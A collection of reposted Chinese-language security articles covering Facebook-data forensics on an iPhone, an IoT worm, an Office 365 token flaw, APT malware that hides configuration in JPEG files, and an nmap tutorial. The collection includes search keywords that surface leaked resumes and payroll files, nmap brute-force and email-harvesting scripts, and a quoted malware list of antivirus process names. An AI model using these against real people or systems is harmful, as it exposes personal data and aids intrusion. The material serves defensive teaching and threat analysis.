噗浪(Plurk)是一個限制字數且類似於Twitter的社群網站,成立於2008年。Plurk透過時間軸的概念與好友分享自己的近況動態,Plurk的特色是其Karma值,Karma值會依使用者使用Plurk發文及回文的次數而有所增減,當Karma值越高,使用者擁有設定及自訂介面的授權程度也隨之提高,Plurk透過這些小巧思,除了吸引使用者使用外,也同時增加使用者對Plurk的黏著度。

鑑識相關工具 

說到鑑識工具,最受信賴的計有iTools、plist Editor以及SQLiteDatabase Browser。

iTools 
使用iOS系統相關設備(iPhone、iPad、iPod touch等)的使用者都知道Apple產品有一個共通的缺點,就是iTunes在使用上有一定的限制,因此出現了一個非官方第三人所開發出來方便管理iOS系統相關設備的人性化工具iTools,讓使用者可以用傳統「拖、拉」的方式管理檔案,亦可針對備份進行管理。

plist Editor 
plist Editor是一個在Windows系統下的Mac OS屬性列表文件的編輯工具,它讓使用者可以編輯plist文件。plist Editor主要特點包括:支援XML的格式和二進位格式的plist文件、語法重點標記、支援一般的表達式搜尋及替換、刪除無限制、提供書籤、可隨時更改外觀並提供容易使用的使用者介面、能夠在保存之前檢查plist語法是否正確。

編輯plist文件,只需透過Windows PLIST編輯器,再打開XML或二進位格式屬性的文件,之後以純文件就可進行編輯,最後以原始格式儲存即可。

SQLiteDatabase Browser 
SQLite是一種小型的資料庫,它包含在一個相對較小的C函式庫內,是一個遵守新增、創造、插入、刪除(Add, Create, Insert, Delete;ACID)的關聯式數據庫管理系統,並且能夠支援Windows、Linux、UNIX等作業系統。SQLite是一個免費、開放原始碼的圖像式工具,一般用在建立、設計和修改一些與SQLite相容的資料庫文件。

SQLiteDatabase Browser讓使用者和開發人員可以使用熟悉的電子表格介面,無需學習複雜的SQL命令,其功能包括:建立和壓縮資料庫文件;建立、定義和刪除索引;瀏覽、編輯、增加和刪除紀錄;建立、定義、修改和刪除表;搜尋紀錄等。

Facebook的愛與恨 

隨著科技的日新月異,人們日常生活中充滿著各種電子用品,無論是手機、平板或電腦都受到大眾的喜愛。而近幾年來社群網站的興起,讓大家的生活幾乎離不開Facebook、Twitter、Plurk。每一個社群網站都有各自的特色,也各自發展出自己特有的使用方式,其中最受大眾歡迎的還是Facebook。

Facebook是功能最為齊全的一項社群網站,可以上傳各式影音、新增網誌,還可以線上聊天;而Twitter和Plurk雖然功能較為簡單,但就是這種簡約的特色讓許多人愛不釋手。

但在快樂地使用這些網站時,人們往往忽略了資訊安全的重要性,讓自己的資料在不知不覺中洩漏出去,甚至因此受到了詐騙集團或有心人士的利用,讓人不得不更加提高警覺。

現在有許多人一不小心就會被有心人士透過這些社群網站詐騙,甚至是電腦資料被竊取、個人資料洩漏,但這些攻擊往往防不慎防,讓人對社群網站感到又愛又恨。

為了讓讀者更了解社交攻擊的危險性,以及對可攜式裝置鑑識有更多的理解,先簡單地介紹一下整個鑑識過程。這裡使用的器材是iPhone(iOS版本5.1.3),所使用的軟體包括iTools、plist Editor以及SQLiteDatabase Browser,安裝的應用程式為最新版本的Facebook。

一般來說,鑑識的方式分為物理萃取和邏輯萃取,物理萃取指的是鑑識人員在被鑑識之手機中安裝鑑識工具,透過鑑識工具將手機內部資訊以位元複製或製作映像檔的方式萃取出來,再以傳統的數位鑑識方式分析。

而邏輯萃取則是透過與作業系統的互動,將被鑑識之手機內可以見到的內容擷取出來。此處必須透過直接操作iPhone的方式搜尋欲取得的數位證據。若所查獲之iPhone手機已經過反鑑識技術加密或損毀,則無法透過邏輯萃取的方式將資料萃取出來。

一開始,採用邏輯鑑識的方式來對iPhone手機進行數位證據的蒐集,先將iPhone連接到電腦上,再開啟iTools讀取iPhone的資料(圖1)。


▲圖1 利用iTools讀取iPhone 4的介面。

然後,從要進行鑑識的資料夾開始尋找可使用之資料(圖2),並依照檔案類型的不同來使用不同的檔案讀取軟體。


▲圖2 iPhone中儲存Facebook資料的資料夾。

基本上,手機內所可能復原的應用程式資訊,包括使用者登入帳號、基本個人資料、登入者的好友帳號、姓名、大頭貼以及信箱等。而這些資料對於鑑識人員來說十分有用,尤其是確認登入者及其發布各項訊息的時間,有助於確認非法者之非法行為及其身分。

情境模擬與案例 

由於前述社群網站的特性,加上許多人因不具備資訊安全意識與個人資料保護的概念,非法者容易利用使用者隨意公布的個人資訊,來進行身分竊盜行為,或藉由其好友圈,了解其習性及身分背景,再藉此進行其他犯罪行為,相關情境如下:

阿陳在路上閒晃時看見使用者小美的iPhone遺落在位置上,阿陳趁四周無人注意偷偷將iPhone手機拿走,學有專精的阿陳回家後將小美的手機進行分析,得知其個人資料及相關照片,甚至是小美的朋友資訊,如姓名、信箱等。

心懷不軌的阿陳先找到小美的共同好友小明(小美國小同學),並冒用其身分新創一個帳號,為了安全起見,阿陳還新增一些基本資料、照片,這些資料皆從小美、小明的帳戶內取得,且加入一些小美、小明的共同好友,一切準備就緒後才加小美為好友。

小美因為好友太多且不具資訊安全概念,不經思考就同意非法者阿陳的交友申請。之後阿陳便開始進行相關詐騙行為,例如向小美和其朋友發送訊息進行相關詐騙行為,或是代接收手機簡訊、代買點數卡、加入有問題的購物社團等。小美在發現手機遺失後,不久便呈請執法單位處理。關係圖如圖3所示。


▲圖3 關係圖。

調查人員循線調查找到阿陳的住處,並在阿陳家中的電腦內找到相關詐騙人士清單,為了確定該部分資料是從小美手機取得,依程序接著將小美的手機進行相關的鑑識工作,整個過程描述如下。

鑑識人員先使用iTools工具進行iPhone的檔案管理備份,由於iTools工具的功能可以讓使用者管理iPhone手機更為方便、自由,而其另外一個好處便是可以直接以模擬手機連結的方式管理備份檔案,並讓備份檔案的資料以介面化的方式呈現,有助於鑑識人員尋找各種資訊,因此鑑識人員只需將備份檔案匯入iTools工具中,便能做進一步的管理,如圖4所示。


▲圖4 工具箱→iTunes備份管理→導入。

鑑識人員發現,由於iOS版本持續地更新以及Facebook應用程式也不斷推出新版本,因此從備份檔案中獲得的資訊十分有限。但透過iTools的功能仍得以直接在iPhone上尋找儲存於Facebook應用程式中的資料,以確認非法者的非法行為,如圖5所示。


▲圖5 開啟Facebook應用程式的檔案管理。

鑑識人員以iTools打開Facebook應用程式後,在「/Facebook」資料夾中找到以介面化所呈現的應用程式分類資料夾,並在其中發現「Facebook/Library/Caches/」資料夾裡儲存了許多備份檔中所沒有的資料。

在該資料夾中找到一個名叫「fbsyncstore」的sqlite檔案,在使用SQLiteDatabase Browser打開後發現,其中存放了使用者小美登入帳號的所有好友及其部分註冊帳號的紀錄,如圖6∼7所示。


▲圖6 顯示好友姓名。


▲圖7 顯示好友註冊帳號。

接著,鑑識人員打開一個名叫Orca2的sqlite檔,發現裡面存有使用者小美登入的姓名、手機號碼以及電子信箱,如圖8所示。


▲圖8 找到使用者的姓名、手機號碼以及電子信箱。

再來打開其子資料夾「FBStore」,從裡面發現一個名叫「Store」的sqlite檔(圖9)。由於該檔案無法直接由SQLiteDatabase Browser打開,必須透過Firefox瀏覽器中一個名為SQLite Manager的附加套件才能執行。


▲圖9 儲存Store檔案所在資料夾。

開啟之後,發現裡面儲存十分多的資料,包括使用者小美所加入過的社團、好友分類、所點選過的應用程式以及連結等等,如圖10∼11所示。


▲圖10 顯示使用者加入過的社團、所點選過的應用程式及連結。


▲圖11 使用者的好友分類。

除此之外,在「Facebook/Library/Caches/ ImageCache」資料夾內發現有儲存部分好友的大頭貼,而從「Facebook/Library/Caches/FBStore/FBDiskCache」資料夾中也找到了許多與使用者小美有關的圖片檔(圖12)。


▲圖12 部分使用者好友的大頭貼圖片檔。

透過上述鑑識人員的操作,經實際比對確認,可以發現在小美的手機中找到的資料與儲存於阿陳電腦中Facebook名單有所重疊(圖13),證明阿陳曾經透過該手機取得相關使用者的個人資料,並與小美進行互動。

也就是說,阿陳是進行詐騙行為的非法者,利用小美對小明的信任與朋友關係,在Facebook建立一個帳號,利用小明在網路上分享的資料與照片,盜用小明的身分,在Facebook上與小美成為朋友關係。

接著,阿陳透過小美所公布的Facebook塗鴉牆、個人訊息、照片內容等相關資料,了解其生活與動態以及小美與小明之間的關係,透過時常攀談建立熟悉感與信任程度之後,藉此進行詐騙取財等等的非法行為。


▲圖13 儲存於非法者阿陳電腦中資料夾內的圖片。

結語 

科技的進步,讓手機等可攜式裝置可以安裝許多有用的應用程式,社群網站為資訊產業帶來新的契機與商機,卻也隨之帶來了許多新的資安事件。

本文透過iPhone手機操作社群軟體,進行手機的鑑識流程,協助鑑識人員在遭遇手機遺失導致資料外流以及社群網站詐騙相關鑑識案件時的因應之道,並透過案例說明了對於非法者盜取了相關的應用程式資訊,其相關的數位證據還是會留存在手機中。

本文作者:中央警察大學資訊密碼暨建構實驗室(ICCL),民國87年12月成立,目前由王旭正教授領軍,實驗室成員共有20名,並致力於資訊安全、資料隱藏與資料快速搜尋之研究,以確保人們於網際網路世界的安全。

轉載自《網管人》

PDF 雲端服務洩個資,機密文件搜尋看光光

PDF 雲端服務洩個資,機密文件搜尋看光光

Caa5317cb7feb1ccf5fcd5ecdd08d0e5最近又發生個資外洩的問題,不過這次不是人力銀行或是網路服務出包,而是一個免費的 PDF 轉檔服務。因為 PDF Online 網站預設公開設定的關係,只要透過簡單的搜尋語法就可以找到不少履歷、個資或是機密文章,但其實這都是使用者自己洩漏出去的。

個資外洩自己也要把關

只要在 Google 上搜尋「求職者編號 sharepdf」就會出現不少求職者的履歷資料,這些不是求職網站的個資外洩,而是使用者在轉 PDF 檔案的時候自行把資料上傳到了 PDF Online 的網路服務上,很不巧這個服務會把 PDF 的內容直接公開在網路上,所以只要透過搜尋就可以找到大量資料。另外也可以使用其他的關鍵字來找到更機密的文件或是個資,像是利用「機密文件 sharepdf」或是以下的關鍵字就可以找到一堆不該被外洩的檔案。

●履歷表 sharepdf
●薪資單 sharepdf
●基本資料 sharepdf
●電話 sharepdf
●行動電話 sharepdf
●地址 sharepdf
●機密文件 sharepdf


▲搜尋機密文件就會發現有不少內部的文件公開在網路上。

PDF Online 其實在上傳資料的時候就有一個選項可以讓文件不被公開在網路上,但預設因為是公開,加上是英文,導致有不少人都直接按下一步讓自己的機密文件公開在網路上。在這也提醒大家不要隨意上傳機密文章到網路上,免費服務在使用前也應該停看聽,才不會個資外洩導致不必要的困擾。

轉載自《T客邦》

物聯網安全亮紅燈,Symantec發現新蠕蟲病毒可以感染路由器、機上盒和Webcam

物聯網安全亮紅燈,Symantec發現新蠕蟲病毒可以感染路由器、機上盒和Webcam


Symantec軟體安全部門的研究者發現了一種新蠕蟲病毒,這種名為 Linux.Darlloz 的病毒被設計用來感染運行嵌入式 Linux 的家庭路由器、電視機上盒和Webcam等設備,一些工業等級的控制系統也在感染機型之列。



物聯網的核心在於嵌入式 Linux ,許多與 Wi-Fi 相連的智慧型設備都在這種系統上運作,甚至許多 Wi-Fi 路由器本身也以這種 Linux 為作業系統。

Symantec軟體安全部門的研究者發現了一種新蠕蟲病毒,這種名為 Linux.Darlloz 的病毒被設計用來感染運行嵌入式 Linux 的家庭路由器、電視機上盒和Webcam等設備,一些工業等級的控制系統也在感染機型之列。

這支蠕蟲病毒已被歸類為低安全風險,因為當前的版本只能感染 x86 平台設備但是這種病毒在經過一些修改之後產生的變種已經能夠威脅到使用 ARM 晶片以及 PPC,MIPS,MIPSEL 架構的設備


這種嵌入式系統一般會有 WEB 設定介面,使用者第一次使用時需要登錄這個介面對設備進行初始設定,因此出廠用戶名和密碼通常都很簡單,比如「 admin 」、「123456」等等。該病毒就利用了這種密碼的規律性。

它會嘗試多種搭配組合來暴力破解設備的初始帳戶,成功進入系統後,它會從伺服器端下載並執行自身程式,它會為自己的文件建立一個目錄,然後試圖切斷對設備的遠端控制手段,比如 Telnet 服務及其它控制進程,接著它就開始對系統中的文件大刪特刪。


當病毒「主宰」了設備後,它就開始攻擊網路上的其它設備。透過隨機產生並測試 IP 位址,它嘗試發現網路上的其它使用中的裝置,如果該裝置不幸也有帳戶薄弱的漏洞,病毒就會故技重施,由此開始下一輪感染。

研究員 Kaoru Hayashi 表示目前 Linux.Darlloz 病毒並沒有造成很大破壞,它主要興趣在於不斷地複製自己

該病毒暴露了當下物聯網設備的脆弱性,這種病毒沒有造成嚴重破壞,並不代表它不能——有了管理員許可權,破壞與否只是心情問題。或許感染路由器不會給生活造成太多損失,但如果它感染了家庭保全的Webcam呢?甚至是感染了家裡大門上的鎖?智慧型金融卡?

使用者可能對感染毫不知情,即便知道中毒情況也難以解決, Hayashi 擔心硬體製造商們可能無法及時給系統更新Patch檔,也有一些硬體已經老得無法升級了。

轉載自《T客邦》

掃port利器開外掛 輕鬆擴充nmap掃描能力

活用四百個現成script 變身弱點掃描等眾多工具
掃port利器開外掛 輕鬆擴充nmap掃描能力

如果想知道主機目前正在運作的服務,相信多數的網管人員腦海裡浮現的第一個解決方案,應該就是利用Nmap掃描軟體來掃描系統。自Nmap軟體推出以來,挾著其優異的掃描能力及免費的優點,早已成為掃描軟體的代名詞。

網管人員通常都是利用Nmap掃描軟體來進行服務掃描,藉以探知目前系統上運作的服務內容,但事實上Nmap的掃描能力遠不止於此,利用其外掛Script的方式,即可將Nmap變身為弱點掃描軟體(可掃描某種類型的弱點)或擴充其他掃描功能(例如掃描網站伺服器上是否有備份檔)。

對此,本文除了介紹Nmap傳統的應用外(如掃描通訊埠),也將示範如何使用Nmap所提供的外掛Script檔案來擴充Nmap的掃描能力。在本文中所使用的軟體套件,如表1所示。

表1 本文所使用的軟體套件 


安裝Nmap 

先至Nmap官方網站(http://nmap.org/dist/nmap-6.40.tar.bz2)下載安裝檔,本文使用的版本為6.40。解壓縮後,利用原始碼的編譯方式:



組態Nmap,並設定安裝的目錄(/usr/local/nmap)。若讀者不想將檔案安裝在某個目錄中,就不需要指定--prefix參數,直接執行「./configure」指令將Nmap安裝到系統的標準目錄內。

然後,先執行指令「make」編譯Nmap原始碼,再執行「make install」指令安裝Nmap相關的程式至指定的目錄,本例為「/usr/local/nmap」。在安裝完成後,可檢查「/usr/local/nmap/bin/」目錄。

Nmap所提供的相關執行檔,如表2所示。

表2 Nmap所提供的相關執行檔 


此外,也可檢查「/usr/local/nmap/share/nmap/scripts」目錄下副檔名為nse的檔案,此類檔案即為Nmap所提供的外掛Script檔案。

在安裝好Nmap軟體後,接著簡單說明通訊埠掃描的原理。一般來說,通訊埠掃描所使用的掃描技術不外乎全連接與半連接的掃描方式。

所謂的全連接,即為一般正常連接的探測方式,利用與遠端主機通訊埠完成三向交握(Three-way Handshake)來確認遠端主機的通訊埠是否處於開啟(Open)的狀態。三向交握的運作方式如圖1所示。
1. 當來源端主機欲跟目的端主機建立連線時,會先發 出SYN封包至目的端。
2. 目的端主機收到後,即會回覆SYN/ACK封包。
3. 當來源端主機收到SYN/ACK封包,將回覆ACK 封包給目的端主機。
4. 上述三個動作皆正常完成後,才會建立連線。進行 資料傳輸。


▲圖1 三向交握。

如果能與遠端主機順利完成三向交握並與通訊埠完成連線,代表該服務埠是處於開啟的狀態。反之,則代表服務埠處於關閉的狀態。此種掃描方式即稱為全連接掃描。

這就像要測試網站伺服器是否正常時,即可利用瀏覽器連接網站伺服器一樣,如果可以正常地瀏覽網頁,代表該網站伺服器的通訊埠已經開啟。

因為全連接掃描的方式是利用正常的網路通訊行為來進行測試,所以此種掃描的方式會被防火牆或是IDS(入侵偵測系統)記錄下來,極為容易被資安設備所偵測出來,因而又發展出「半連接」掃描技術。

所謂半連接的掃描技術,是指在未與通訊埠完成正常的網路通訊行為(例如三向交握)時,即由該通訊埠的回覆來判別結果。常用的半連接掃描技術如下所述: 

.SYN封包掃描 
在上述的三向交握機制中,當傳送端主機要傳送資訊至接收端主機時,會先發出SYN封包到接收端主機,一旦接收端主機接收到之後,會回覆SYN/ACK封包給傳送端主機,而後傳送端主機將再回覆ACK封包至接收端主機,至此連線階段建立,方可開始傳送資訊。 

而SYN封包掃描即是在發出SYN封包至對方主機後,如果對方主機有正常地回應SYN/ACK封包,即表示埠(Port)是開啟的情況,並立即發出RST封包,切斷該次連線。由於並未完整地完成三向交握連線,所以防火牆或IDS(入侵偵測系統)並不會記錄該次的連線。 

.SYN/ACK封包掃描技術 
SYN/ACK掃描是利用繞過三向交握第一步的SYN封包傳送,而直接利用傳送SYN/ACK封包至目的主機上的埠口,由於TCP協定具有連接性的性質,當目的埠口接收到此封包後,如果它是開啟的狀態,就知道此封包並不是合法的封包(因為沒有相對應SYN封包),而直接丟棄(Drop)。 

但如果目的埠口是關閉的狀態,則會回傳RST封包(直接重置該連線),SYN/ACK掃描即可利用此種特性來確認埠是否在開啟的狀態。 

.FIN封包掃描技術 
FIN掃描是利用繞過三向交握第一步的SYN封包傳送,而直接利用傳送FIN封包至目的主機上的埠口。 

當目的埠口接收到此封包後,如果它是開啟(Open)的狀態,就知道此封包並不是合法的封包(因為沒有相對應SYN封包),而直接丟棄(Drop),但如果目的埠口是關閉的狀態,則會回傳RST封包(重置該連線),FIN掃描即可利用此種特性來確認埠口是否處於開啟的狀態。 

可以利用下列指令來掃描被探測主機所開啟的埠及服務資訊(圖2): 


▲圖2 利用SYN掃描來探測被探測主機所開啟埠資訊。

以下列出常用的Nmap通訊埠掃描參數,詳見表3所示。 

表3 Nmap常用通訊埠掃描參數 

藉由上述的相關參數,即可以輕易地掃描出遠端主機目前通訊埠的服務狀況,甚至其服務的程式名稱以及版本等敏感資訊都能夠輕易地掃描出來。介紹完Nmap的傳統應用,接下來便為讀者說明如何利用Nmap掃描軟體外掛的Script功能來增強Nmap自身的掃描能力。 

Script簡介 

就如同其他類似的掃描軟體(例如病毒掃描軟體)常會使用外掛程式的方式來增強其掃描能力,好比防毒軟體用這個方法來更新自身病毒碼,而著名的弱點掃描軟體Nessus就藉此來更新外掛。 

在Nmap軟體上即提供NSE程式語言(某種Script語言)來為自身編寫相關的Script程式,以便提供額外的掃描能力。搜尋Nmap安裝目錄下的「/share/nmap/scripts/」,即可查閱相關的Script。 

具有程式能力的管理人員,甚至可改寫該Script以更加符合自己的需求。但其實僅需使用如下的語法即可使用Script的功能(其中的targetIP為欲掃描的IP位址): 


舉例來說,「nmap --script=http-backup-finder 127.0.01」即是表示使用名稱為「http-backup-finder」的Script來掃描本機(127.0.0.1)。若未設定「--script-args」參數,則表示使用預設參數。 

另外,也可利用萬用字元(*)來載入相關的Script,如下例即表示載入HTTP相關的Script來進行掃描: 


接著,介紹幾個可用於掃描網站伺服器相關漏洞的Script用法。 

http-backup-finder 

一般在程式開發時,經常會直接在網站伺服器上修改網頁程式,而某些編輯器或開發工具在修改程式的當下,會為了安全的理由而新建一個原先程式的暫存檔或備份檔。 

以UltraEdit編輯器為例,在修改完原先的程式後,將在同目錄下產生一個副檔名為.swap的暫存檔案。程式設計師往往會忽略此類檔案,而將此類檔案置於網站上,因而造成潛在的資安問題。 

Nmap則提供了一個相當好用的Script,名稱為「http-backup-finder」。利用此Script可用來搜尋網站上相關的備份檔。 

表4列出了「http-backup-finder」Script的相關參數。 

表4 http-backup-finder相關參數 

圖3所示為執行的範例(..bak為備份檔案),其中的「-p 80」代表僅針對通訊埠80的服務進行掃描,如果讀者的網站伺服器有支援SSL功能,便可設定通訊埠為443(-p 443)。 

▲圖3 http-backup-finder執行範例。

http-auth 

在很多的情況下,所開發的網頁程式需要權限的控管,而在HTTP通訊協定中其實也有提供許多利用認證的方式來控管網頁。 

當設定完成相關的網頁認證後,也可利用Nmap所提供的「http-auth」Script來掃描網頁,以確定所使用的網頁認證的認證方式。此Script僅提供一個參數,如下所述: 


圖4為執行範例,其中的「Basic realm」為其所使用的網頁認證型式。 

▲圖4 http-auth執行範例。

http-email-harvest 

在個人資料保護法通過後,國人對於個人的隱私也越來越重視。也因此網站管理者對於網站所公開的資訊也必須相當注意,以免在無意間洩漏了個人的相關資訊,例如E-mail資訊經常在管理人員的疏忽下而被置放在網站的公開資訊中。 

Nmap提供了「http-email-harvest」Script,可用來擷取網站內的E-mail資訊,以便得知網站中有多少的E-mail相關資訊。「http-email-harvest」Script提供了如表5所示的參數。 

表5 http-email-harvest使用參數 

▲圖5 http-email-harvest執行範例。


如圖5為「http-email-harvest」Script的執行範例,利用這個Script可以取得網站中已公開的E-mail相關資訊。 

http-brute 

一般網站經常會利用HTTP通訊協定中的基本認證來對相關的網頁進行控管,如果帳號及密碼設定得過於簡單,就非常可能被暴力破解法所破解(利用猜測帳號密碼的方式進行攻擊)。 

Nmap也提供了一種利用猜測帳號密碼來測試基本認證的方式,可用來測試基本認證中的帳號…密碼強度是否足夠。「http-brute」Script所提供的參數如表6所述。 

表6 http-brute可用參數 

如圖6為執行範例,其中的指令為針對本機上的基本認證網頁,以暴力猜測法的方式來測試是否可取得帳號及密碼等資訊。 

▲圖6 以暴力猜測法來測試是否能夠取得帳號及密碼。

http-methods 

http-methods這個Script主要是應用來檢測網站伺服器上所支援的方法(Method),常用的方法如表7所述。 

表7 http-methods常用方法 

執行指令如圖7所示,可以檢查網站伺服器上是否有危險的方法。 

圖7 檢查網站伺服器上是否存在著危險的方法。

在一般正常上線運作的網站伺服器中,是不應該開啟DELETE與PUT方法,因為此兩種方法都會提供惡意的使用者上傳或刪除網路伺服器內檔案的權限。 

但在實務經驗上,經常會發現有些網站伺服器在開發程式的階段,為了方便而開啟了DELETE與PUT等相關方法,但在程式開發完成正式上線之後,卻忘了關閉這些危險的方法,因而讓惡意使用者可以利用這些方法對網站伺服器上的檔案造成極大的危害。 

結語 

本文僅說明幾個常用的Script,事實上這個版本的Nmap具備了四百多個的Script,提供不同的掃描思惟。就「弱點掃描」的角度而言,筆者認為其中有幾個Script(如偵測預設檔案、備份檔案等),就可用來與市面上幾個較有知名度的弱點掃描軟體互補,提供系統更周全的資安健檢,此部分就請有興趣的讀者繼續研究吧! 

本文作者:吳惠麟,多年資安經驗,喜好利用開源碼建構相關解決方案。現任職於台灣學術網路危機處理中心(TACERT)。著有「資訊安全原理與實驗」。
TACERT官方網址:http://cert.tanet.edu.tw/

轉載自《網管人》

《2020》網路危機系列短片

《2020》網路危機系列短片

《2020》是一系列根據 ICSPA 的「2020 專案」報告所改編的影片,描述一個不久即將發生的未來世界。這些影片以虛構的故事呈現­該報告當中所描繪的社會變遷與科技演進。我們將告訴您行動及雲端技術的演進如何影響人­與人之間以及人與世界的互動,還有人們如何工作以及如何認知現實的世界。

ICSPA 的「2020 專案」報告下載處:
http://2020.trendmicro.com/Project2020.pdf

《2020》官方網站:
http://2020.trendmicro.com/

不得不說這一系列拍得相當好,片中描述了許多近未來的科技(基本上是諷刺某些公司),並依此闡述其帶來的危害!

中文影片:
第一集「當機
第二集「保持冷靜
第三集「我們沒料到這種狀況
第四集「你見過這小子嗎?
第五集「早已身在其中
第六集「駭客激進份子
第七集「保持離線狀態
第八集「眾矢之的
第九集「好奇心的魔爪


轉載自《網路攻防戰》

微軟Office 365雲端服務漏洞(含影片示範)

微軟Office 365雲端服務漏洞(含影片示範)

Office 365要求使用者登錄自己的帳號,每當從SharePoint伺服器上下載文件時,便會透過單一認證令牌(authentication token)的發送,來對當下登入使用者的憑證進行驗證。

然而,Liran卻發現,透過運行自己的伺服器,並回送合法SharePoint伺服器所預期的回應時,使用者便可隨意地發送認證令牌。

「若現在,我的惡意Web伺服器,擁有你的個人Office 365認證令牌,那麼便能夠輕易地進入貴公司的SharePoint Online網站,並可下載、修改所有憑證,甚至為所欲為,而你將毫無所覺。事實上,你甚至連遭到攻擊都不知道,這會是個完美的犯罪。」


原文出處:Office 365雲端服務出現漏洞 允許駭客竊走憑證
轉載自《網路攻防戰》

2013年12月18日 星期三

安全防護表現亮眼的資料庫管理員的 7 種管理習慣

安全防護表現亮眼的資料庫管理員的 7 種管理習慣

資料庫管理員或資安專家們都必須培養特定的管理習慣,以確保資料安全方案能正確無誤地執行。然而,根據 Independent Oracle Users Group (IOUG) 2013 Enterprise Data Security Survey (企業資料安全調查)  指出,目前大部份的企業組織都還沒有達成這個目標。

IOUG的調查針對受訪者在2013年的資料庫安全方案執行狀況和目標完成程度來區分領先者和落後者。完成三項基本活動者,包括了解哪些資料庫包含機敏資料、對閒置中和移動中的資料全部加密以及監視生產資料庫以偵察非法存取或變更的,就是領先者。調查結果顯示,只有  22% 是領先者,20%是落後者,其他人則是介於中間。

領先者可能遭遇資料外洩事件的機會,比落後者少三倍。所以,了解領先者們有哪些重要的管理習慣,再從中學習,有助於改善資料庫安全的執行效果。

1.他們知道機敏資料在哪裡,能對症下藥,進行適當保護。
2.他們經常進行稽核,了解資料庫的存取情況。
3.他們監視資料庫活動與系統變更,以便提早發現潛在的問題。大部份組織都有監視高權限使用者的活動、登入失敗和登錄行為,但是未進行更具體、細部的監視。
4.將資料加密,即使攻擊者繞過資料庫防護網來竊取資料也不必擔心 。
5.確保使用者僅可以經由應用程式存取資料。
6.管理高權限使用者的存取,包括資料庫管理者帳戶及應用程式帳戶。
7.將生產用資料保留在資料庫環境中,受到完整的保護,才不會成為安全的致命弱點。

原文出處:http://www.darkreading.com/database/7-habits-of-highly-secure-database-admin/240164634
轉載自《Chalet Taiwan Support Forum》

2013年12月14日 星期六

APT目標攻擊使用JPEG檔案

APT目標攻擊使用JPEG檔案

趨勢科技最近看到一些來自SOGOMOT和MIRYAGO家族的惡意軟體會用不尋常的方式來更新自己:它們會下載包含加密過設定檔案/二進位程式的JPEG檔案。不僅如此,我們認為這手法至少從2010年中就開始了。我們所看到的這惡意軟體最值得注意的地方是它會隱藏自己的設定檔。這些JPEG檔案放在亞太地區的網站上,並且被用在針對這地區的APT-進階持續性滲透攻擊 (Advanced Persistent Threat, APT)目標攻擊上。


分析JPEG更新

雖然JPEG檔的內容加密過,我們還是可以解密並分析這些檔案的內容。我們可以將它們分成三類:

設定檔案(A型)
設定檔案(B型)
二進位內容(無論是DLL或EXE檔案)

第一種設定檔(A型)跟我們在其他惡意軟體所看到的類似。它包含讓惡意軟體可以執行來自攻擊者指令的資訊,更改設定/模組,並進行自我更新。這些設定內有其他惡意JPEG檔案的網址。此外,這些檔案顯示攻擊者可能已經成功入侵了目標組織,因為有些資料涉及特定的機器或個人。

第二種設定檔(B型)似乎和防毒軟體有關。它包含來自不同廠商的多種防毒產品程序名稱,以及目標網路內的主機名稱資料。這裡是一份B型檔案的部分,解碼後為:

Virus=*avp.exe*,*kavmm.exe*,*klserver.exe*|Kaspersky|*nod32kui*,*ekrn.exe*|ESET|*frameworkService*,

*mcshield*|McAfee|*smc.exe*,*rtvscan.exe*|Symantec|*kwatch.exe*,*kxeserv.exe*,*kxescore.exe*|Kingsoft|

*ravtask.exe*,*ravmond.exe*|Rising|*avguard*,*sched.exe*|Avira|*kvsrvxp*|jiangming|*avgrsx.exe*,

*avgwdsvc.exe*|AVG|*tmlisten*,*ntrtscan.exe*,*tmntsrv*|Trend Micro|*360sd.exe*|360sd|

*zhudongfangyu.exe*|360safe|*qqpcrtp.exe*,*qqpctray.exe*|QQPCMGR|

這個設定檔比遠小於A型設定檔。此設定內的某些值也證明了感染已經到了攻擊的第二階段。

除了設定檔案外,JPEG格式檔案也包含了可執行檔案,可能是惡意軟體本身的更新,或是想要安裝到受影響系統上的新惡意軟體。

JPEG檔案託管和外觀

這些JPEG檔案放在許多網站上,大多分佈在亞太地區。有某些網站看來是合法的內容,意味著可能是被入侵後託管這些檔案。

下面是我們所看到部分JPEG檔案的截圖:

APT目標攻擊使用JPEG檔案

APT目標攻擊使用JPEG檔案



趨勢科技已經獲得這些JPEG檔案的多個樣本,並且基於這些樣本,我們認為這種更新模式最早用在2010年6月,並且使用至今。更新的頻率也都大不相同:有些幾乎是每日更新,有些的更新間隔會隔了數月。

資料外洩

使用解密過設定檔案的資料,我們可以取得該惡意軟體所發送的電子郵件。這些郵件包含名稱為tplink2.bin的加密附件檔。此檔案包含以下資料:

受感染機器網路上的主機名稱和IP地址
惡意軟體所存取過的JPEG檔案列表
作業系統的詳細資訊,包括已安裝的安全更新

原文出處:JPEG Files Used For Targeted Attack Malware 作者:Jayronn Christian Bucu
轉載自《雲端運算與網路安全趨勢部落格》

延伸閱讀:
使用 APT 攻擊的手法越來越精緻化了(含影片說明)
APT攻擊頻傳 客製化防禦策略日漸重要
臺灣首份APT白皮書出爐,8成受駭機構9個月才察覺
防禦APT從Log分析開始
非典型APT